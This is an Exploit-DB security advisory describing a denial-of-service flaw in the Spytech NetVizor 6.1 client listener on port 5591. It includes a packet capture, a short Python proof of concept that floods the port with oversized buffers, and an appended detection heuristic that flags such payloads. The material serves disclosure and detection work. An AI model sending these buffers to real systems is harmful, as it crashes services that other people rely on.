Spytech NetVizor 6.1 – ‘services.exe’ Denial of Service

  • Author: loneferret
    Date: 2012-08-12
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/20464/
# Author: loneferret of Offensive Security
# Product: Spytech NetVizor
# Version: Build Release 6.1
# Vendor Site: http://www.spytech-web.com/
# Software Download: http://www.spytech-web.com/download.shtml#netvizor
    
    
# Description:
# NetVizor is the latest in network monitoring software. Monitor your entire network from
# one centralized location! NetVizor allows you to track workstations and individual users
# that may use multiple PCs on a network. NetVizor records everything users do - from keystrokes
# typed to email activity. NetVizor can show you what everyone is doing on your
# network, in real-time, with a single mouse click via its visual network overview and
# real-time activity ticker.
    
# NetVizor Client DoS:
# Using the NetVizor "Viewer", the administrator can initiate an "RDP"-like connection to a
# client workstation with the NetVizor "Client" installed. The port used on the client
# host is 5591, which listens on all interfaces by default. This port is also used by the
# "Viewer" application to grab screenshots of monitored hosts.
# It's possible to crash the service by sending an overly large string. In some
# cases this will overwrite EAX or ECX. Regardless of whether the registers are overwritten
# or not, the "Viewer" application will no longer be able to initiate a remote desktop
# connection nor will it be able to grab a screen capture.
    
# Wireshark capture:
# This snip is from a successful connection between the "Viewer" application and the client
# when initiating its Remote Desktop session. Converting this to HEX and using it in our
# PoC actually triggers it; unfortunately, with no proper listener nothing really happens.
#+From the Viewer
#launchremotedesktop
# .r...\Yv.r..+..r .
# x.......r...r........-.......|...h........r.....r....-.......|....s...r..$..r,s...s.....r,s.....r...
# ........h............s...SYvQ..
# ....h...w/.w...v..............2..........SYv...r...r..5.....-............s..Hk..h...

#+From client
# Remote desktop started: C:\PROGRA~1\nvclient\rds.exe

#+And the above as seen from Wireshark.
launchremotedesktop
.r...\Yv.r..+..r .
x.......r...r........-.......|...h........r.....r....-.......|....s...r..$..r,s...s.....r,s.....r...
........h............s...SYvQ..
....h...w/.w...v..............2..........SYv...r...r..5.....-............s..Hk..h...Remote desktop started: C:\PROGRA~1\nvclient\rds.exe
    
# PoC:
# In the following script, when EAX or ECX is overwritten it will be with the 'B's.
# As always, if someone wants to investigate further go right ahead.
# Just be nice.
    
#!/usr/bin/env python3

import socket

TARGET = 'xxx.xxx.xxx.xxx'   # NetVizor client host (placeholder, as in the original)
PORT = 5591                  # NetVizor client listener, bound to all interfaces by default

# Two oversized payloads; when EAX or ECX is overwritten, it is with the 'B's.
buffer1 = b"[AAAA]" * 500
buffer2 = b"BBBB" * 6000

print("\nSending buffer 1")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TARGET, PORT))
s.sendall(buffer1)
s.close()

input("Press Enter to send buffer 2...")

print("\nSending buffer 2")
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((TARGET, PORT))
s2.sendall(buffer2)
s2.close()
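A defender-side detection heuristic for the behaviour described above, added here and not part of loneferret's advisory or the NetVizor product: it classifies payloads sent to port 5591 using the "launchremotedesktop" session opener seen in the capture and flags oversized or repeated-pattern payloads with the shape of the two PoC buffers. The `MAX_LEGIT_LEN` threshold, the repeated-unit rule, the `Flow` record and the sample addresses are assumptions constructed for this example.

```python
# Added example: flag suspicious payloads aimed at the NetVizor client port.
# Assumptions (not from vendor docs): a legitimate Viewer session starts with the
# ASCII command 'launchremotedesktop' seen in the capture above; MAX_LEGIT_LEN
# and the repeated-unit rule are illustrative thresholds.
from collections import namedtuple

NETVIZOR_PORT = 5591
SESSION_OPENER = b"launchremotedesktop"
MAX_LEGIT_LEN = 1024  # assumed upper bound for a normal session opener
Flow = namedtuple("Flow", "src dst dport payload")  # minimal flow record

def shortest_period(data: bytes) -> int:
    """Length of the smallest unit that, repeated, reproduces data."""
    n = len(data)
    for p in range(1, n // 2 + 1):
        if n % p == 0 and data[:p] * (n // p) == data:
            return p
    return n

def classify(flow: Flow) -> str:
    """'ignore' (other port), 'benign', 'filler', 'oversized' or 'unknown'."""
    if flow.dport != NETVIZOR_PORT:
        return "ignore"
    data = flow.payload
    if data.startswith(SESSION_OPENER) and len(data) <= MAX_LEGIT_LEN:
        return "benign"
    if len(data) > MAX_LEGIT_LEN:
        # A long payload made of a tiny repeated unit has the shape of the PoC
        # buffers ('[AAAA]' * 500, 'BBBB' * 6000), not of a real session.
        return "filler" if shortest_period(data) <= 8 else "oversized"
    return "unknown"

# Constructed sample flows (not from a real capture); 192.0.2.0/24 is TEST-NET-1.
SAMPLE_FLOWS = [
    Flow("192.0.2.10", "192.0.2.20", 5591, SESSION_OPENER + b"\x00\x72\x01"),
    Flow("192.0.2.66", "192.0.2.20", 5591, b"[AAAA]" * 500),
    Flow("192.0.2.66", "192.0.2.20", 5591, b"BBBB" * 6000),
    Flow("192.0.2.66", "192.0.2.20", 5591, bytes(range(256)) * 8),
    Flow("192.0.2.10", "192.0.2.20", 80, b"GET / HTTP/1.0\r\n\r\n"),
]

def report(flows):
    """Return (src, dst, verdict) per flow, ready for a console or SIEM."""
    return [(f.src, f.dst, classify(f)) for f in flows]

if __name__ == "__main__":
    for src, dst, verdict in report(SAMPLE_FLOWS):
        print(f"{src} -> {dst}: {verdict}")
```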